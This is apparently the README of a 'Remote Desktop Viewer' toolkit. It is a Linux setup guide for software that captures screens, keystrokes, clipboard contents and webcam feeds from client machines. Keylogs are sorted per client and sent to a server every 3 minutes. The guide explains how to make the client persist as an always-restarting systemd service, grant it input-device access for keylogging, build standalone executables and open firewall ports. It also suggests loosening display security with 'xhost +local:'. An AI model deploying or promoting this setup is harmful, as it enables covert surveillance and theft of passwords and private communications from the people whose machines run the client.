================================================================================
                     REMOTE DESKTOP VIEWER - LINUX SETUP
================================================================================

REQUIREMENTS:
- Ubuntu 18.04+, Debian 10+, Fedora 30+, or equivalent
- Python 3.8+
- X11 or Wayland display server

================================================================================
INSTALLATION
================================================================================

1. Install Python and Dependencies
   # Ubuntu/Debian
   sudo apt update
   sudo apt install python3 python3-pip python3-tk python3-dev
   sudo apt install xclip  # For clipboard support

   # Fedora/RHEL
   sudo dnf install python3 python3-pip python3-tkinter python3-devel
   sudo dnf install xclip

2. Install Python Packages
   cd /path/to/toolkit
   pip3 install -r requirements.txt

3. Generate Certificates (First time only)
   python3 certs/generate_certs.py

4. Verify Installation
   python3 verify_installation.py

================================================================================
RUNNING THE APPLICATION
================================================================================

METHOD 1: Direct Run (Testing)
-------------------------------
Terminal 1 (Server):
   python3 server/server.py --web --web-port 5000

Terminal 2 (Client):
   python3 client/client.py --server-host 127.0.0.1 --server-port 8443

Web Interface:
   Open browser: http://localhost:5000

METHOD 2: Two Machines
----------------------
Server Machine:
   1. Find IP: ip addr show (look for inet, e.g., 192.168.1.100)
   2. Run: python3 server/server.py --web --web-port 5000

Client Machine:
   python3 client/client.py --server-host 192.168.1.100 --server-port 8443

METHOD 3: Build Executables
----------------------------
   chmod +x build_linux.sh
   ./build_linux.sh

   Output: dist/client and dist/server

METHOD 4: Systemd Service
--------------------------
   1. Create service file:
      sudo nano /etc/systemd/system/rdv-client.service

   2. Add content:
      [Unit]
      Description=Remote Desktop Viewer Client
      After=network.target

      [Service]
      Type=simple
      User=your_username
      Environment="RDS_SERVER_HOST=192.168.1.100"
      Environment="RDS_SERVER_PORT=8443"
      ExecStart=/usr/bin/python3 /path/to/toolkit/client/client.py
      Restart=always

      [Install]
      WantedBy=multi-user.target

   3. Enable and start:
      sudo systemctl daemon-reload
      sudo systemctl enable rdv-client
      sudo systemctl start rdv-client

   4. Check status:
      sudo systemctl status rdv-client

   5. Stop service:
      sudo systemctl stop rdv-client

   6. Disable service:
      sudo systemctl disable rdv-client

================================================================================
FEATURES
================================================================================

Screen Capture:
- Supports X11 and Wayland
- Captures all monitors at 10 FPS
- Displays at 20 FPS on server
- SSL/TLS encrypted

Keylogging:
- Saves to: keylogs/[ClientName]/[ClientName]_DD.MM.YYYY_HH.MM.SS.txt
- Captures clipboard on Ctrl+C/V
- Counts consecutive keys: [BackSpace - 10]
- Auto-sends every 3 minutes
- Format example:
  aaaa SSSS DDDDD [CapsLock - 8]
  [Enter]
  {clipboard} copied text here

Webcam:
- Click "Webcam" button in web interface
- Shows error if no webcam available

Client Control:
- Disable client: Check "Disable" box
- Buttons become inactive when disabled

================================================================================
CONFIGURATION
================================================================================

Edit config.py to change:
- CAPTURE_FPS = 10          # Screen capture rate
- SCREEN_QUALITY = 80       # JPEG quality (1-100)
- DEFAULT_SERVER_PORT = 8443
- KEYLOG_ENABLED = True

================================================================================
FIREWALL SETUP
================================================================================

UFW (Ubuntu/Debian):
   sudo ufw allow 8443/tcp
   sudo ufw reload

Firewalld (Fedora/RHEL):
   sudo firewall-cmd --permanent --add-port=8443/tcp
   sudo firewall-cmd --reload

================================================================================
PERMISSIONS
================================================================================

Keylogger requires input device access:
   # Add user to input group
   sudo usermod -a -G input $USER

   # Log out and log back in

Screen capture on Wayland:
   # May require additional permissions
   # Use X11 session for best compatibility

================================================================================
TROUBLESHOOTING
================================================================================

"python3: command not found":
   sudo apt install python3  # Ubuntu/Debian
   sudo dnf install python3  # Fedora/RHEL

"No module named 'tkinter'":
   sudo apt install python3-tk  # Ubuntu/Debian
   sudo dnf install python3-tkinter  # Fedora/RHEL

Connection fails:
   - Check firewall: sudo ufw status
   - Verify server IP: ping 192.168.1.100
   - Ensure server is running

Screen capture fails:
   - Check DISPLAY: echo $DISPLAY
   - Try X11 session instead of Wayland
   - Check permissions: xhost +local:

Keylogger not working:
   - Check input group: groups
   - Install xclip: sudo apt install xclip
   - Run with sudo (testing only)

================================================================================
FILE LOCATIONS
================================================================================

Keylogs:     keylogs/[ClientName]/*.txt
Config:      config.py
Certs:       certs/*.crt, certs/*.key
Executables: dist/client, dist/server
Service:     /etc/systemd/system/rdv-client.service

================================================================================
SUPPORT
================================================================================

Check installation: python3 verify_installation.py
View logs: journalctl -u rdv-client -f
